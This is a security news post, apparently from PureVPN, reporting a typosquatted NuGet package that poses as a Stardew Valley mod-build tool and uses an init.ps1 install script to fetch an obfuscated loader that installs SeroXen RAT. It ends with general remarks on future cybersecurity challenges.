An alarming discovery in software supply chain security highlights a malicious package residing on the NuGet package manager, designed explicitly for the .NET Framework.
This package masquerades as legitimate, with the deceptively similar name “Pathoschild.Stardew.Mod.Build.Config.”
This occurrence came to light due to the presence of a remote access trojan (RAT), known as SeroXen RAT, concealed within the package.
What is SeroXen?
SeroXen RAT is a commercially available fileless RAT, obtainable for a mere $60 for a lifetime subscription, making it disturbingly accessible to cybercriminals. This malicious tool combines the functionalities of the Quasar RAT, the r77 rootkit, and the Windows command-line tool NirCmd.
More Details
The genuine package, Pathoschild.Stardew.ModBuildConfig has garnered nearly 79,000 downloads, indicating its popularity among developers.
In stark contrast, the malicious variant has artificially inflated its download count since its publication on October 6, 2023, surpassing the milestone of 100,000 downloads.
The people behind this evil package, operating under “Disti,” have also released six additional packages, collectively amassing over 2.1 million downloads.
Four of these packages are libraries associated with various cryptocurrency services, including Kraken, KuCoin, Solana, and Monero.
However, beneath this, their true intent is to facilitate the deployment of the SeroXen RAT.
Initiation Points
The attack sequence is initiated during the package’s installation through a script labeled “init.ps1.” This script’s purpose is to execute code without triggering any warnings.
JFrog had previously disclosed this method in March 2023, as it was exploited to retrieve subsequent-stage malware.
Despite being deprecated, the “init.ps1” script is still recognized by Visual Studio and runs without any warnings. Within this script, an attacker can insert arbitrary commands.
In the analyzed package, this PowerShell script is employed to fetch a file named “x.bin” from a remote server. In reality, this file is a heavily obfuscated Windows Batch script, which, in turn, is responsible for constructing and executing another PowerShell script.
Ultimately, this chain of actions culminates in deploying the SeroXen RAT.
This incident underscores the persistent exploitation of open-source ecosystems and the developers who rely on them by malicious actors.
What’s the Way Forward?
It is clear that the challenges of cybersecurity today are increasingly complex, and they’re bound to become even more intricate in the future.
The discovery of a malicious NuGet package targeting .NET developers highlights the persistent need for vigilance in software supply chain security.
As technology advances, we’re urged to proactively invest in robust cybersecurity measures and stay attuned to emerging threats.
Quantum computing and AI hold incredible promise but demand meticulous attention to security and ethical considerations.
Tomorrow’s landscape will require a delicate balance between innovation and safeguarding data privacy.
Also, embracing eco-friendly technology underscores the convergence of sustainability and security in shaping our digital future.
PureVPN
October 13, 2023
2 years ago
